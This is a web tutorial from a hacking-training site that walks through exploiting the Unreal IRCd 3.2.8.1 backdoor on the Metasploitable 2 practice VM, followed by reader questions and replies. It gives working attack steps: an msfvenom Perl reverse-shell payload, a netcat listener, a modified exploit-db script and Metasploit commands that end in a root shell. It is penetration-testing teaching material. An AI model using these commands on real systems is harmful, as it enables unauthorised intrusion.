• Home
  • About Us
  • General
  • Wireless
  • Web
  • Scanning
  • Metasploit
  • Hacking Courses
    • OSCP
    • The Virtual Hacking Labs
    • Certified Ethical Hacker (CEH)
    • Hacking Books
  • More
    • Exploit tutorials
    • Pentesting Exchange
    • Networking
    • Malware Analysis
    • Hacking Metasploitable 2/3
    • Digital Forensics
  • Contact
Facebook Twitter Instagram
Trending
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
  • Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
  • Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
  • Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
Facebook Twitter YouTube Tumblr Instagram Pinterest
Hacking Tutorials
  • Home
  • About Us
  • General
  • Wireless
  • Web
  • Scanning
  • Metasploit
  • Hacking Courses
    • OSCP
    • The Virtual Hacking Labs
    • Certified Ethical Hacker (CEH)
    • Hacking Books
  • More
    • Exploit tutorials
    • Pentesting Exchange
    • Networking
    • Malware Analysis
    • Hacking Metasploitable 2/3
    • Digital Forensics
  • Contact
Hacking Tutorials
You are at:Home » Metasploit Tutorials » Hacking Unreal IRCd 3.2.8.1 on Metasploitable 2
Hacking Unreal IRCD on Metasploitable 2

Hacking Unreal IRCd 3.2.8.1 on Metasploitable 2

16
By Hacking Tutorials on September 10, 2016 Metasploit Tutorials

In this tutorial we will be hacking Unreal IRCd service on Metasploitable 2. We will learn how to perform enumeration on network services and how to define and retrieve crucial information. Then we will be looking at how to perform code analysis and modify payloads using msfvenom before we execute the exploit. In order to retrieve more information about the Unreal IRCd service we need to connect to the IRC channel using an IRC client. We will start with installing the HexChat IRC client and connect to the IRC channel to see if we can get more information about this service. Such as the version number for example which could not be retrieved with Nmap. When we know which version of Unreal IRCd we are dealing with, we can continue with performing a vulnerability assessment. Then we will be exploiting the found vulnerabilities both manual and by using the Metasploit framework.

From the Metasploitable enumeration tutorial we got the following information from Nmap:

hacking Unreal IRCd
Hacking Unreal IRCd: 2 open ports for Unreal IRCd: 6667 and 6697

Connecting to the IRC Server with HexChat

Let’s start with connecting to the IRCd service and see if we can find more detailed information about this service. For instance a version number. If you don’t have an IRC client installed on your Kali Linux you can install Hexchat by using the following command:

apt update && apt install -y hexchat

Then we start HexChat add a new network with the Metasploitable 2 IP. Click the add button and name the new network Metasploitable 2:

hexchat-add-network
Click on the add button to add a new network and name it Metasploitable 2.

Next click on the Edit button and enter the Metasploitable 2 IP address for the new network and use port 6667 as following:

hexchat-edit-server
Click edit to specify the IP and port divided by a slash sign.

Close the windows and click on the connect button to connect to the IRC service on Metasploitable 2. When all of the supplied information is correct HexChat will connect to the Unreal IRC service as following:

hexchat metasploitable 2 IRC channel

A lot of information is presented to us when we enter the IRC channel. The hostname, some configuration information and what we were looking for: the version number of the Unreal IRC service. As you can see the version is Unreal 3.2.8.1. We can use this information to perform a vulnerability assessment and see how we can exploit this service. Let’s feed this information to searchsploit and exploit-db to see if this version of Unreal IRC is vulnerable and how we can exploit it.

Unreal IRCD 3.2.8.1 vulnerability assessment

Before we will be hacking Unreal IRCd we need to check this version of Unreal IRCD for vulnerabilities using searchsploit on Kali Linux and exploit-db.

Searchsploit

Let’s start searching Searchsploit for an exact match using the following command:

searchsploit unreal ircd 3.2.8.1

searchsploit-unreal-ircd-3-2-8-1
A few direct hits from searchsploit.

As we already expected there are 3 direct hits for this version of Unreal IRCd:

  1. The first is a remote downloader and Trojan execution script written in Perl.
  2. The second is a Metasploit exploit written in Ruby.
  3. The third result is a local configuration stack overflow exploit for Windows which can be used to DOS the service. Since we already know that the target machine is running Linux we will ignore this search result.

Searching Exploit-db

We have also searched exploit-db for Unreal IRCD 3.2.8.1 and got the same results:

exploit-db-unreal-ircd

We will be exploiting the Unreal IRCd service in this hacking tutorial using the Perl script and the Metasploit module. Let’s start with the Perl script.

Exploiting Unreal IRCd manually

In the next steps we will be exploiting the Unreal IRCd service using the Perl exploit we’ve found with searchsploit and Exploit-db.

Analysing Unreal IRCD 3.2.8.1 – Remote Downloader/Execute Trojan

Before we launch any scripts and exploits we need to analyse the code and see what it exactly does. Let’s start with the first part of the script which contains the different payloads.

Use the following command to print the script contents to the console:

cat /usr/share/exploitdb/platforms/linux/remote/13853.pl

Code analysis part 1

unreal-ircd-exploit-part-1

Let’s have a look at the different payloads in this script:

  •  Payload 1 downloads a bind shell using wget, saves the file as bind shell, set the privileges to make it executable and then run the payload. Since we cannot see the downloaded file we can only guess that this file sets up a bind shell on the target host.
  • Payload 2 downloads a file named bot. We can only guess what this option exactly does.
  • Payload 3 downloads a file too which is saved as rshell. Then the correct permissions are set and the file is executed. We can only guess that the downloaded payload is a reverse shell.
  • Payload 4 stops the Unreal IRCD service.
  • Payload 5 removes the Unreal IRCD service from the server. Let’s proceed with the next block of code which retrieves the arguments, validates them and print information to the console about how to use the exploit.

Code analysis part 2

unreal-ircd-exploit-part-2

The first three lines set the value of 3 variables named host, port and type to nothing. Then they are assigned with the values from the first three arguments; the host, the port and the type. The 3 lines to follow test the 3 variables for null values and execute the usage function when a null value is found on 1 of the variables. This will exit script execution since the usage function ends with exit(1). In the usage instructions we can see that 5 different types can be used to launch this exploit. The type numbers correspond with the 5 payloads we’ve been looking at before.

When we look at the options carefully we can see that type 2 and 3 have been switched in the code:

  • Type 2 should be triggering a reverse shell, but payload 2 downloads a bot file.
  • Type 3 mentions a Perl bot, payload 3 downloads a file name rshell.

Code analysis part 3

In the next code block we can see that the selected type number matches the payload number on execution. Type 1 executes payload 1, type 2 executes payload 2 etc. Very strange but a great example teaching us why we need to analyse the (source)code before compiling and launching exploits.

unreal-ircd-exploit-part-3

Hacking Unreal IRCd video tutorial

The following video demonstrates each step in hacking unreal IRCd 3.2.8.1 from locating the Perl exploit using searchsploit to generating the new reverse shell payload and exploit execution.

Modifying the Unreal IRCD 3.2.8.1 exploit

Since we have no control over the downloaded file and we do not know the contents of this file, we will modify the exploit to get control over the payloads. We will be performing the following steps:

  • Generating a reverse shell payload using msfvenom.
  • Modify the exploit code.
  • Get a reverse shell using a Netcat listener.

Reverse shell payload

One major downside of the current Perl script is that it depends on wget for successful exploit execution. The exploit would fail if wget is not present on the target host. This is often not the case but we will be removing this dependency by initiating a Perl reverse shell directly from the command line instead of a file.

Use the following command to generate a Perl payload using msfvenom:

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.100.108 LPORT=4444 -f raw

msfvenom-perl-reverse-shell-payload
Generate a Perl reverse shell using msfvenom.

We can test the payload by issuing the msfvenom output to the command line and open a netcat listener on our attack box:

test-perl-reverse-shell-payload
Execute Perl from the command line

And receive shell on the netcat listener:

test-perl-reverse-shell-payload-netcat
Reverse shell is working from and to the attack box.

You can see that we got a connection from our own attack box to the attack box since the connect to and from IP addresses are exactly the same. Let’s proceed with editing the original Perl exploit and replace the payload by our own payload we have just generated with msfvenom.

Exploit modification

Now we know that the reverse shell payload from msfvenom is working we can copy the Perl exploit script to our desktop with the following command:

cp /usr/share/exploitdb/platforms/linux/remote/13853.pl /root/Desktop/13853.pl

Then open the Perl script and modify payload 1 as following:

replace payload
Replace all commands except AB; with our own payload.

NOTE: Be sure to escape the single quote signs containing the Perl reverse shell code with a backslash. Also remove the other payloads in order to avoid mistakes with unwanted consequences.

Executing the exploit

Now that our exploit has been modified and we know what gets executed, it is time to launch our exploit on Metasploitable 2. First we need to setup a netcat listener using the following command:

nc -lvp 4444

The next step is to run the exploit using the following command:

perl 13853.pl [target IP][port]1

execute-unreal-ircd-exploit

Then we receive a reverse shell on our netcat listener:

metasploitable 2 unreal ircd root shell
Root shell on Metasploitable 2 by exploiting the backdoor in Unreal IRCd 3.2.8.1

Let’s continue with hacking Unreal IRCd using the Metasploit Framework.

Hacking Unreal IRCD 3.2.8.1 with Metasploit

Now we will be exploiting this backdoor in Unreal IRCD using Metasploit. Let’s fire up msfconsole and search for the correct module using the following command:

search Unreal IRCD

metasploit-unreal-ircd-exploit
We will be using the unreal_ircd_3281_backdoor exploit.

Now type the following command to use the correct module:

use exploit/unix/irc/unreal_ircd_3281_backdoor

Next we look for a compatible payload and select one using the set payload command:

show payloads

set payload cmd/unix/reverse_perl

metasploit-unreal-ircd-payloads

Now type show options to see what fields we need to modify and set the correct values:

show options

set rhost [target ip]

set lhost [attackbox ip]

metasplouit-unreal-ircd-exploit-options

And type run to execute the exploit:

metasploit-unreal-ircd-root-shell
root shell.

And there we got a root shell on Metasploitable 2 using the backdoor in Unreal IRCD.

Hacking Unreal IRCd with Metasploit video tutorial

The following short video demonstrates how to hack unreal IRCd 3.2.8.1 using Metasploit.

Lessons learned from hacking Unreal IRCd

The lessons learned in this hacking Unreal IRCd tutorial is:

  • Service enumeration is very important to find and use exploits that work in a penetration test.
  • Always analyse the exploit code before launching them and make sure that an exploit acts as it is advertising.
  • Never trust payloads you cannot verify or test, replace them if necessary.

Service Enumeration

At the start of this tutorial we knew there was an IRC service running on multiple ports from the Nmap scan. We did not know what version of Unreal IRCd was running because the Nmap scans did not mention that. Connecting to a service to extract more information is a crucial part of the service enumeration process. The version number appeared to be the missing puzzle piece in order to perform effective and efficient vulnerability analysis. Eventually we got the version number by connecting to the Unreal IRC service with an IRC client.

Effective exploit execution

In this particular example there are only a few Unreal IRCd exploits available which apply to only 2 versions of Unreal IRCd. One of them is a DOS exploit for Windows which we have ignored in this tutorial thus leaving us with 2 remaining options. We could have tested them quickly to see if the service was vulnerable. Instead we chose to retrieve the version number and launch an exploit from which we know it has a high success rate because of the direct match with the version number. It is very recommended to work this way and be more precise when it comes to launching exploits. You want to choose your exploits to launch carefully because they may crash a service, generate unnecessary traffic or change the target’s state in another way. Also when you are facing more common software with a lot of vulnerabilities for many versions, working effective and efficient becomes more important. The trial and error method will increase the risk of crashing a service and consume a lot more time than necessary.

Analyse code before executing it

Last but not least, never ever trust payloads you cannot verify or test. In this tutorial we’ve encountered a Trojan downloader as payload. We have no control over the contents delivered by the source and therefore we have replaced the payload by our own payload.

Thank you for reading this hacking tutorial and do not hesitate to ask questions using the comment functionality below. Liked the tutorial? Please share it.

Share on:

  • Email
Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
Previous ArticleReview: Offensive Security Certified Professional (OSCP)
Next Article Hacking dRuby RMI Server 1.8

Related Posts

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

Installing Rogue-jndi on Kali Linux

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations

16 Comments

  1. Slash on October 16, 2016 9:36 am

    198.168.100.104/6667
    This Ip address is belongs to irc server or we simply create an ip address with 6667 port??
    I use the ip and port above but it cant connect forever

    Checksum plugin loaded
    Python interface loaded
    Perl interface loaded
    Sysinfo plugin loaded
    Do At plugin loaded
    FiSHLiM plugin loaded
    * Looking up 192.168.100.104
    * Connecting to 192.168.100.104 (192.168.100.104:6667)
    Please help me.. what should i do to make it connect?

    Reply
    • Hacking Tutorials on October 16, 2016 11:19 am

      You should use the Metasploitable 2 IP address there. In the tutorial Metasploitable 2 got IP address 198.168.100.104. In your case it could be different.

      Reply
  2. Vinit on December 7, 2016 9:01 am

    pt-get install -y hexchat
    Reading package lists… Done
    Building dependency tree
    Reading state information… Done
    E: Unable to locate package hexchat

    I am unable to install hexchat and kali 2.0 apt also gives segmentation fault.

    Reply
    • baphomet on June 9, 2017 9:30 pm

      you should do an apt-get dist-upgrade
      maybe check the kali site for the proper source ok ?

      Reply
  3. Harry on June 17, 2017 11:21 pm

    Hi,

    Im trying to Exploit Unreal IRCd manually with the trojan according to your tutorial. Unfortunately,
    i dont get the reverse shell on my netcat listener :(
    I get [+] payload sent…., but thats all..
    Actually im using root-me.org web site to get the metasploitable 2 virtual machine.
    the ip adress i got today to exploit that machine is 212.83.142.83. but im wondering if i cant get the listener
    because my Lhost adresse is in a local network. (fake one) just for exemple. my adress ip is 192.168.0.103.
    But this is my local adress. so if i use as Lhost i think the Rhost wont be able to reach me coz we are not together on local network, it needs my ip adress of my modem then my local adress ip to reach me (im not alone at home so i have few local adresses. It is Right?
    but now how can i write that in the LHOST command? maybe 104.45.789.34 (adresse modem)
    104.45.789.34;192.168.0.103 ???
    thanks to replay
    cheers

    Reply
    • Hacking Tutorials on June 18, 2017 9:09 am

      Hi! You need to use your public IP as LHOST for the payload. Then go to your router/firewall settings and forward the specified LPORT to your local IP address on the network. Finally setup a listener on the local IP address and port. This should give you a shell.

      Reply
      • Harry on June 20, 2017 1:44 am

        okay thank you for the explanation :)
        cheers

        Reply
        • Hacking Tutorials on July 4, 2017 3:26 pm

          You’re welcome!

          Reply
      • Harry on June 25, 2017 3:55 am

        Hello again I have an another question still with Metaspoitable 2…
        When exploiting the Unreal ircd after send the payload in Perl (Trojan)
        Are we just allowed to exploit the files corresponding to Unreal, but nothing else?
        (If I wanna go to the passwd directory or another repertory with the “eg. cd Desktop”
        i cant move apparently)

        Do i need to increase my privilege?

        2. Can i instead use the cmd/unix/reverse_pl, can i use eg. linux/x64/shell “or meterpreter”/reverse_tcp and use msfvenom to create a payload in Perl raw ?
        I tried but looks doesnt work!
        Thanks in advance for your advises cheers

        Reply
        • Hacking Tutorials on July 4, 2017 3:25 pm

          Hello, You can exploit all files you’ve got access too, it doesn’t have to be particularly unreal files. You can try different payloads, when using the ‘show payloads’ command all compatible payloads will be displayed.

          Reply
  4. Zac on March 3, 2018 11:17 am

    Hey, great write up! I can really see the value in examining the code before running it rather than blindly trusting it, especially in a profession pentest where a clients systems are at risk. However due to my inexperience, I do not know what exactly I should be looking for when examining code and am wondering if there is something you could recommend to improve in this department or gain more insight. Thanks!

    Reply
  5. Jay on April 14, 2018 4:49 am

    Hey guys, awesome tutorial.

    Unfortunately I am unable to use nc to listen on port 4444 and therefore unsure if the payload succeeded

    I conducted a scan of the port and it returned with:

    4444/tcp closed krb524

    Further research has not helped me, so am hoping you could shed some light on the subject for me.

    I have both Metasploitable 2 and Kali setup through VMWare Fusion Pro on the latest 2017 iMac:

    Bridged
    M2 ip xxx.xxx.xx.206 (Ethernet)
    Kali ip xxx.xxx.xx.200 (wifi via USB adapter)

    My router is a FritzBox!7490

    Any help would be greatly appreciated.

    Thanks again

    Jay

    Reply
    • Hacking Tutorials on April 17, 2018 2:05 pm

      Hi Jay,
      Thank you, glad to hear that you like the tutorial!

      Why are you unable to use NC to listen on port 4444? Netcat should be listening on port 4444 on your local machine, then you have to modify the payload in such way that it connects back to this port.

      Best regards,
      Hacking Tutorials

      Reply
  6. Jay on April 19, 2018 11:06 am

    Hey guys,

    Thanks for the follow up. Rookie error by me as I was placing the target ip instead of attack ip.

    Smooth sailing now.

    Sorry for the stuff around.

    Thanks again

    Jay

    Reply
    • Hacking Tutorials on April 19, 2018 3:57 pm

      Hey Jay,

      Great you got it working now, that solves a lot :)

      Thank you for the follow up too!

      Reply
  7. shankar on November 20, 2018 7:46 pm

    I added the backslash “\” in the payload as mentioned by you. once executed i get the payload sent message. the listener is ready but i don’t see any connection coming back. but if executed with msf its working. pls help.

    Reply

Leave A Reply Cancel Reply

Top Tutorials
By Hacking TutorialsOctober 29, 20220

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

By Hacking TutorialsJanuary 10, 20220

Installing Rogue-jndi on Kali Linux

By Hacking TutorialsDecember 17, 20210

Log4Shell VMware vCenter Server (CVE-2021-44228)

By Hacking TutorialsSeptember 27, 20210

The Great Leak: Microsoft Exchange AutoDiscover Design Flaw

By Hacking TutorialsFebruary 4, 20200

CVE-2019-19781: Citrix ADC RCE vulnerability

By Hacking TutorialsNovember 1, 20188

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations

Subscribe

Enter your email address to subscribe to Hacking Tutorials and receive notifications of new tutorials by email.

Join 828 other subscribers
Recent Tutorials
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
Virtual Hacking Labs
Penetration Testin Course and Hacking Labs
Categories
  • Digital Forensics
  • Exploit tutorials
  • General Tutorials
  • Hacking Books
  • Hacking Courses
  • Malware Analysis Tutorials
  • Metasploit Tutorials
  • Networking
  • Pentesting Exchange
  • Scanning Tutorials
  • Web Applications
  • Wifi Hacking Tutorials
Downloads
  • directory_scanner.py (120600 downloads)
  • PEiD-0.95-20081103.zip (111452 downloads)
  • wifi_jammer.py (138196 downloads)
Recent Tutorials
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
  • Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
Popular Tutorials
By Hacking TutorialsSeptember 1, 2016115

Review: Offensive Security Certified Professional (OSCP)

By Hacking TutorialsApril 18, 201738

Exploiting Eternalblue for shell with Empire & Msfconsole

By Hacking TutorialsMarch 17, 201637

Installing VPN on Kali Linux 2016 Rolling

Featured Downloads
  • directory_scanner.py (120600 downloads)
  • PEiD-0.95-20081103.zip (111452 downloads)
  • wifi_jammer.py (138196 downloads)
© Hacking Tutorials 2022

Type above and press Enter to search. Press Esc to cancel.

Go to mobile version